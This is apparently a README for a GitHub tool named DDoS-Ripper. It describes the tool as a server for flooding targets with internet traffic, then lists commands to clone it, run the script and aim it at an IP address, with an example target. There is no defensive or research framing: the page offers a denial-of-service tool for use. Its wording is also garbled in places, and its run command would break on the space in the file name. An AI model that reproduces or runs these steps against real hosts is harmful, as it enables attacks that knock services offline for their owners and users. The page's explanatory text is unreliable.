A Distributable Denied-of-Service (DDOS) attack server that cuts off targets or surrounding infrastructure in a flood of Internet traffic
DDoS attacks achieve effectiveness using multiple compromised computer systems as a source of attack traffic. Search engines may include computers and other network resources such as IoT devices. From a higher level, the DDOS attack is like an unexpected traffic jam stuck on a highway, preventing regular traffic from reaching its destination.
$ git clone https://github.com/palahsu/DDoS-Ripper
$ cd DDoS-Ripper
$ ls
$ python3 DDOS Ripper.py
$ python3 DDOS Ripper.py -s [ip Address] -t 135
$ example: python3 DDOS Ripper.py -s 123.45.67.89 -t 135